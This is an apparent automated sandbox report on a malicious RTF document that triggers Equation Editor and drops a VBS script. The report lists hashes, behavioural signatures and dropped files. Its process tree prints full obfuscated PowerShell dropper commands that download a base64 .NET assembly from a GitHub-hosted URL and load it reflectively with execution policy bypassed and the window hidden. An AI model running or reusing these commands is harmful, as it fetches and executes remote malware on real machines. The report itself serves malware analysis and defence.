Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/10/2024, 09:30

General

  • Target

    33083e3d8cad434bfff8cdb97032babe.rtf

  • Size

    75KB

  • MD5

    33083e3d8cad434bfff8cdb97032babe

  • SHA1

    9defb395eda345c770a559ba6c46cba8226c2974

  • SHA256

    85ed27cc2b2264295dfc90a985944887053ffe9a79894914ea7f69e6a7de42e2

  • SHA512

    3750b71501d7412725484c72203a6440647e479fc43991199a2dfb5a4c0c5223ca9858864504d388fec1bbf94c539a1f2bcd56275698803f81bd4301e32ecf6a

  • SSDEEP

    384:+uNWTVICMS5DryYNfvw5vV8Sj7OYqsg4ozn67fT5PfSsMnCbh03MNyC0DAgqh5Ji:XMyGw5vV8fYq3pz6T5SBnC903P0gwtt8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33083e3d8cad434bfff8cdb97032babe.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2912
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturegreatwithmeenterings.Vbs"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSk5IdXJsJysnID0gdlhzaHQnKyd0JysncHM6Ly9yYXcuZ2l0aHVidXNlJysncmNvbnRlbnQuY28nKydtJysnL05vRGV0ZWN0JysnT24nKycvTm8nKydEZXRlY3RPbi9yZWZzL2hlYWRzL21haW4vRCcrJ2V0YWgnKydOb3RoLVYuJysndHgnKyd0dlhzOyBKTkhiYXMnKydlNjRDbycrJ24nKyd0ZW50JysnID0nKycgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbCcrJ2llbnQpLkRvJysnd25sbycrJ2FkU3RyaW5nKCcrJ0pOSHVybCk7IEpOSGJpbmFyJysneUMnKydvbicrJ3RlbnQgPSBbU3lzdGVtLkNvbnYnKydlcicrJ3RdOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKEpOSGJhc2U2JysnNENvbnRlbnQpOyAnKydKJysnTkhhc3NlJysnbWJseSAnKyc9ICcrJ1tSZScrJ2ZsZWMnKyd0aScrJ29uJysnLkFzcycrJ2VtYmx5XScrJzo6TG9hZChKTkgnKydiaW5hcnknKydDb250ZW50KScrJzsgJysnW2RubGknKydiLicrJ0knKydPLkhvbWVdOjpWJysnQUkoRnN6dHgnKyd0LkNCQk5SLycrJzIyJysnMi81MjEuMjMuOCcrJzYxLicrJzQwJysnMS8vOnB0dGhGc3osIEYnKydzemRlc2EnKyd0JysnaXZhZG9Gc3osICcrJ0ZzemRlc2EnKyd0aXZhJysnZG9Gc3osIEZzeicrJ2Rlc2F0aXZhZG8nKydGc3osJysnICcrJ0ZzJysnelJlZ0FzbUZzeiwgRnMnKyd6RnN6LEZzekYnKydzeiknKSAgLWNSZXBMYWNFKFtjaEFyXTExOCtbY2hBcl04OCtbY2hBcl0xMTUpLFtjaEFyXTM5LWNSZXBMYWNFIChbY2hBcl03NCtbY2hBcl03OCtbY2hBcl03MiksW2NoQXJdMzYgLWNSZXBMYWNFICAnRnN6JyxbY2hBcl0zNCkgfCAuKCAkRU52OkNvTVNwRWNbNCwyNCwyNV0tak9JTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('JNHurl'+' = vXsht'+'t'+'ps://raw.githubuse'+'rcontent.co'+'m'+'/NoDetect'+'On'+'/No'+'DetectOn/refs/heads/main/D'+'etah'+'Noth-V.'+'tx'+'tvXs; JNHbas'+'e64Co'+'n'+'tent'+' ='+' (New-Object System.Net.W'+'ebCl'+'ient).Do'+'wnlo'+'adString('+'JNHurl); JNHbinar'+'yC'+'on'+'tent = [System.Conv'+'er'+'t]::Fro'+'mBase64Str'+'ing(JNHbase6'+'4Content); '+'J'+'NHasse'+'mbly '+'= '+'[Re'+'flec'+'ti'+'on'+'.Ass'+'embly]'+'::Load(JNH'+'binary'+'Content)'+'; '+'[dnli'+'b.'+'I'+'O.Home]::V'+'AI(Fsztx'+'t.CBBNR/'+'22'+'2/521.23.8'+'61.'+'40'+'1//:ptthFsz, F'+'szdesa'+'t'+'ivadoFsz, '+'Fszdesa'+'tiva'+'doFsz, Fsz'+'desativado'+'Fsz,'+' '+'Fs'+'zRegAsmFsz, Fs'+'zFsz,FszF'+'sz)') -cRepLacE([chAr]118+[chAr]88+[chAr]115),[chAr]39-cRepLacE ([chAr]74+[chAr]78+[chAr]72),[chAr]36 -cRepLacE 'Fsz',[chAr]34) | .( $ENv:CoMSpEc[4,24,25]-jOIN'')"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2632

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      4bccf8480f472b72c55e1206fd163b67

      SHA1

      a00c9029a19ac54949ad5f67fe47ba67ef8f64a4

      SHA256

      7198ad32a8c3eac820dcbd65ba810e7a44f0080c616be93512393ed9b1b7f86a

      SHA512

      eb5b769a4763020792caf17a5a9cb2dd493439f4010a92acf15e48ba029436dd4371cfdc249578d9195599ab42db22c585d4545492c82cdf72cbfa44f827ba44

    • C:\Users\Admin\AppData\Roaming\picturegreatwithmeenterings.Vbs

      Filesize

      295KB

      MD5

      007afe1a2061ae137aca64fb3c7b9e9b

      SHA1

      965108b7ee5a55eb30b12ea1a352b1e49c3897e0

      SHA256

      8e4222077584ea49b2abfcf58c0192fa0d3d763f4c49f41f555e661bba2bba1d

      SHA512

      e973fd68f1ee43bc41220a214a486bed4b200fe3e116f011b93f00281cfce462d6af531bb5eb9b7f2c1038c91b4cbf77790efa660aa84d4e927bd802f010adcf

    • memory/2340-0-0x000000002F641000-0x000000002F642000-memory.dmp

      Filesize

      4KB

    • memory/2340-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2340-2-0x0000000070AAD000-0x0000000070AB8000-memory.dmp

      Filesize

      44KB

    • memory/2340-19-0x0000000070AAD000-0x0000000070AB8000-memory.dmp

      Filesize

      44KB